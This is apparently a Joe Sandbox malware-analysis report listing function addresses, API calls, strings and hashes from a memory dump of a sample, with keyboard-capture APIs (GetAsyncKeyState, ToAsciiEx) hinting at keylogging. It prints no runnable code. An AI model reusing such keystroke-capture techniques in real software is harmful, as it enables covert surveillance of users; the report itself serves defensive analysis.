Instruction ID: 2fb82cc3a0fa93134cc2fd0e4ae17875a3c705c4f0e67e3c627a234725724e7b
Opcode Fuzzy Hash: a9a610ff3a829c3e9c3a1f4c84149d572bab5df43195f70e3817d45e3e420289
Instruction Fuzzy Hash: 8311D271705302ABE310CF14DCC5B2A77A5EBC8718F08092EF64997291D730EC02CBAA

Function 00433870 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00433882
__wcstoi64.LIBCMT ref: 004338BB

Part of subcall function 00489975: strtoxl.LIBCMT ref: 00489996

Part of subcall function 00489456: __wcstoi64.LIBCMT ref: 0048944C

__wcstoi64.LIBCMT ref: 004338EB
_strncpy.LIBCMT ref: 00433917
_strncpy.LIBCMT ref: 00433939

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$_strncpy$_memsetstrtoxl
String ID:
API String ID: 3605233017-0
Opcode ID: ad0974f4ffcd9943b61c75e80fa1326199231624ab4f269fd65e12dd5e210126
Instruction ID: 9c5f8b1bd29a3bbbebb0cb5983b6908e6b7eb4365d27aec54cfeb8c878da007c
Opcode Fuzzy Hash: ad0974f4ffcd9943b61c75e80fa1326199231624ab4f269fd65e12dd5e210126
Instruction Fuzzy Hash: B311DFB05483416AE321FB11CC42BAE76D45F86704F04083EF6885A2C3EAB85209874B

Function 0046E7D0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 359COMMON

Download Yara Rule

Strings

Parameter #2 invalid., xrefs: 0046EA0F
Too few parameters passed to function., xrefs: 0046E7FE
Parameter #1 invalid., xrefs: 0046E886

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Parameter #1 invalid.$Parameter #2 invalid.$Too few parameters passed to function.
API String ID: 0-982959277
Opcode ID: 6a12a4229e6f250e9d66aa482c3ae8f610b4245e85ad11473937ef4040cbe133
Instruction ID: 5f12a26533710fa3118a5b1a4bd28945c1944316514622b5e2457420ae7cce22
Opcode Fuzzy Hash: 6a12a4229e6f250e9d66aa482c3ae8f610b4245e85ad11473937ef4040cbe133
Instruction Fuzzy Hash: 8AD17E756042069FDB14CF5AC480A6BB3E1FF88318F148A2FE85987341E739E949CB97

Function 0045CC90 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

Icon, xrefs: 0045CED8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoui64
String ID: Icon
API String ID: 3882282163-3316025061
Opcode ID: f7ff03076811e965ab3e5b2fcc754776651dce140e8efa4491d457e938471764
Instruction ID: dc6336cd4eff1712d6b38cf1e4197e65d8692b601666ef7ef19be12779ef1531
Opcode Fuzzy Hash: f7ff03076811e965ab3e5b2fcc754776651dce140e8efa4491d457e938471764
Instruction Fuzzy Hash: 92B127726083459FC720DF25C881BAB7BE1AF85311F14492FFD8587382D679984ACB9A

Function 00451A80 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 315COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,00000000), ref: 00451C79

Strings

List, xrefs: 00451E34, 00451ED2
+-^, xrefs: 00451C85
Combo, xrefs: 00451E1A, 00451EB8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongWindow
String ID: +-^$Combo$List
API String ID: 1378638983-3984048703
Opcode ID: dde2e1930168e83b8593055a622a44cc4e990c1eca5320de98b5fc090bd3fe27
Instruction ID: 7f8d152e59f62eb31abe2cfa47ea326015b68a0b8125dc2d351085c920995845
Opcode Fuzzy Hash: dde2e1930168e83b8593055a622a44cc4e990c1eca5320de98b5fc090bd3fe27
Instruction Fuzzy Hash: 8D91AB716443403BE721A6649C82F7B77949B82B55F04092FFD009B2D3E6ADED4C83AB

Function 00448DA0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

Part of subcall function 0042F9F0: __itow.LIBCMT ref: 0042FA12

__strdup.LIBCMT ref: 00449061

Strings

O, xrefs: 00449090
ERCP, xrefs: 00448EB4
RegExMatch, xrefs: 00448FB3

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow__strdup
String ID: ERCP$O$RegExMatch
API String ID: 2502612177-700926398
Opcode ID: bb3ea5f274c826249ef2c6afdc4b2b31b5021731e8c9e3a29a640fae26d6f1a6
Instruction ID: f5c7c364bac0d562e2473cbc6cfb1db78305de1b69bb294279ef05ddf7e96f95
Opcode Fuzzy Hash: bb3ea5f274c826249ef2c6afdc4b2b31b5021731e8c9e3a29a640fae26d6f1a6
Instruction Fuzzy Hash: 69B1C271A002189FEF14CF54C881AAFBBB5EF48314F2480AEE815AB341DB39DD45CB99

Function 0047A1B0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0047A252
__fassign.LIBCMT ref: 0047A3D9
EnumChildWindows.USER32(00000000,00479250,?), ref: 0047A451

Part of subcall function 00488021: __mbscmp_l.LIBCMT ref: 0048802E

Strings

%s%u, xrefs: 0047A4C0

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign$ChildEnumWindows__mbscmp_l
String ID: %s%u
API String ID: 25460344-679674701
Opcode ID: cb4dfcdbee733878530bd6eb2cbc77f5259ee19ee3d4071214163dddaed1e7f4
Instruction ID: fd183d68bc067cb3cc63f08530df877eb3c2f2d4da3358855f901ccbe049a187
Opcode Fuzzy Hash: cb4dfcdbee733878530bd6eb2cbc77f5259ee19ee3d4071214163dddaed1e7f4
Instruction Fuzzy Hash: 0791D2316041885BEB75DF54DC45BEF3394ABD0305F04C52BED4C8A381DB3AAA69C79A

Function 0042E350 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 253COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0042E3F3
_memmove.LIBCMT ref: 0042E462

Strings

Out of memory., xrefs: 0042E3AA
", xrefs: 0042E447

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memmove_strncpy
String ID: "$Out of memory.
API String ID: 406987823-1555670740
Opcode ID: 00abe6d88885e3ac72fca5b91e7e3b15ec08da552e8f80d20e2b997053c99dee
Instruction ID: 9618782100398d1164bf34c6f6df688b937c2f6b2652b3b2d3ace3ea750b0469
Opcode Fuzzy Hash: 00abe6d88885e3ac72fca5b91e7e3b15ec08da552e8f80d20e2b997053c99dee
Instruction Fuzzy Hash: 17913971F00164ABDF20DF96E8407AFBBB49F45308F5840AAD805AB342E3799D45CBA6

Function 004111A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 0041124B

Strings

V~;;, xrefs: 00411515

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AsyncState
String ID: V~;;
API String ID: 425341421-2485313632
Opcode ID: 35bc2f28334da3d8cbc0291c0e2e011636143b4d79b91a61130ab5a99a2863f3
Instruction ID: 837504b87486715f892527589d1912f49c21517b2f8d831ed4e601e3b70a515a
Opcode Fuzzy Hash: 35bc2f28334da3d8cbc0291c0e2e011636143b4d79b91a61130ab5a99a2863f3
Instruction Fuzzy Hash: B281B07050C3819BE731DB2488087EBBBE1AB96314F08095FEA95473A1C67C99C9C79B

Function 00402644 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001111,00000000,?), ref: 00402656

Part of subcall function 00475D00: GetWindowRect.USER32(?,?), ref: 00475D08

_memset.LIBCMT ref: 00402A8B
SendMessageA.USER32 ref: 00402AC0

Strings

call, xrefs: 00402C12

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$RectWindow_memset
String ID: call
API String ID: 1972968356-3431870270
Opcode ID: 536bc60c3c2025610fdc48c08cb379a2fd80e9938be06466a72e326bc8da78f4
Instruction ID: 9f18588e591b7b43e6abb6e9a19e8b0aaa2212c862e5bf444479863b5e752a9d
Opcode Fuzzy Hash: 536bc60c3c2025610fdc48c08cb379a2fd80e9938be06466a72e326bc8da78f4
Instruction Fuzzy Hash: E981AE706083408FD725DF18C985B9BBBE5BF88308F24892EE4889B3D1D7B9D945CB56

Function 00411650 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00411728
__wcstoi64.LIBCMT ref: 0041175F

Part of subcall function 00489975: strtoxl.LIBCMT ref: 00489996

__wcstoi64.LIBCMT ref: 0041178C

Strings

,, xrefs: 004116C0

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$strtoxl
String ID: ,
API String ID: 3288754983-605440088
Opcode ID: 2e2df6f9d20ed6892a20028b7afffd99332ecbaf44c33c83821138b3c4ee15fb
Instruction ID: 141f1cf077fa21b376a8d1004e89b54247efb63a041f61a8b965390b90a2bf2c
Opcode Fuzzy Hash: 2e2df6f9d20ed6892a20028b7afffd99332ecbaf44c33c83821138b3c4ee15fb
Instruction Fuzzy Hash: 985106706043419FD7219F2488417E77BD19F56344F18895AEAC51B3A2D37E98C2C76F

Function 00445F60 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 004460C3

Strings

0x, xrefs: 00446103
DllCall, xrefs: 00446136

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow
String ID: 0x$DllCall
API String ID: 3482036329-1668725812
Opcode ID: 52bd5410b29275ec6237077618adf25a921e3a23e5dd58fd9fb3539057f84950
Instruction ID: d0b5f1761ed1f7b5b143602c2b32d1da3c3418aa9eda09598a2633f6b7e46ab6
Opcode Fuzzy Hash: 52bd5410b29275ec6237077618adf25a921e3a23e5dd58fd9fb3539057f84950
Instruction Fuzzy Hash: 31619FB0E002589FEF14CF98D885BAEBBB5FB49310F10462AE415A7381D779AC45CB5A

Function 0040718A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

ToAsciiEx.USER32(00000000,?,?,00000000,00000000,00000000), ref: 00407229
ToAsciiEx.USER32(00000000,00000000,?,00000000,00000000,00000000), ref: 00407250
ToAsciiEx.USER32(?,?,?,00000000,00000000,00000000), ref: 0040732E
ToAsciiEx.USER32(?,?,?,00000000,00000000,?), ref: 00407424
ToAsciiEx.USER32(?,?,?,?,00000000,?), ref: 00407516
ToAsciiEx.USER32(?,?,?,?,00000000,?), ref: 0040753E
_memset.LIBCMT ref: 00407564
ToAsciiEx.USER32(?,?,?,?,00000000,?), ref: 004075AC

Strings

ApplicationFrameWindow, xrefs: 0040718E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Ascii$_memset
String ID: ApplicationFrameWindow
API String ID: 3049224079-3747838517
Opcode ID: ddcf9200e20a4f5f2498cdaf35ffe789cc48ba8e608daac44c7b5356417c1c5b
Instruction ID: 46f1547fb840ea3ea442fd1d9c4caeb7f898f45362971a4406598940c897abb9
Opcode Fuzzy Hash: ddcf9200e20a4f5f2498cdaf35ffe789cc48ba8e608daac44c7b5356417c1c5b
Instruction Fuzzy Hash: 9741167550C3805AE321CB749C40BE77FE4ABC6704F08897DF99856292D279A40ACB6A

Function 00477170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 004771A3

Part of subcall function 00489975: strtoxl.LIBCMT ref: 00489996

__wcstoi64.LIBCMT ref: 004771C2

Strings

+, xrefs: 004771AD
.-+, xrefs: 004771D4, 004771F8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$strtoxl
String ID: +$.-+
API String ID: 3288754983-3777370404
Opcode ID: b26a1249eb065402b93f24782adbb4f564c82b0e3316cc1983daf51b36a83e65
Instruction ID: ea114eaae240ef7d80c91ac12073ced734cd7adf1f31277bcbdc780227165da0
Opcode Fuzzy Hash: b26a1249eb065402b93f24782adbb4f564c82b0e3316cc1983daf51b36a83e65
Instruction Fuzzy Hash: 7131195264C2942ADB30995898807F777C5DBA3361FE885E7F4AD8B383D61C4C87835A

Function 00465930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0046599E
__itow.LIBCMT ref: 004659C6
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00465A20

Strings

Submit, xrefs: 00465963

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongMessageSendWindow__itow
String ID: Submit
API String ID: 200294860-949859957
Opcode ID: 7957ab2e372968aa6e56a3307eb49af4fba9e19d6ade9fdf5f595f895a73587d
Instruction ID: 44e34e3324ec139e7f3fcf1373dc85aed6a9e9300c8b81d28122475c1f264475
Opcode Fuzzy Hash: 7957ab2e372968aa6e56a3307eb49af4fba9e19d6ade9fdf5f595f895a73587d
Instruction Fuzzy Hash: 54418171505B11AFD630DE98C980B2BB7A4BB40B24F10471FF960672D1E7B9EC8987DA

Function 00453D10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

\*.*, xrefs: 00453DB8, 00453DEC
\, xrefs: 00453D41
\, xrefs: 00453D7C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: \$\$\*.*
API String ID: 0-2011813617
Opcode ID: 552d6e3d987f36ccfbe7754eb3bc3bfd34e393c6e126f355e721620e90de25b9
Instruction ID: c5050544b84c549380441c971543ea4b1b42ac80689e35c3a4c504c58c8b7d22
Opcode Fuzzy Hash: 552d6e3d987f36ccfbe7754eb3bc3bfd34e393c6e126f355e721620e90de25b9
Instruction Fuzzy Hash: FD41E6700083859FD322EF28D894EEBBBF8AF85345F044A5AE5C487293DB74960DC756

Function 00488ED8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00488EE6

Part of subcall function 00487C53: __getptd.LIBCMT ref: 00487C66

Strings

q[, xrefs: 00488EFA

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
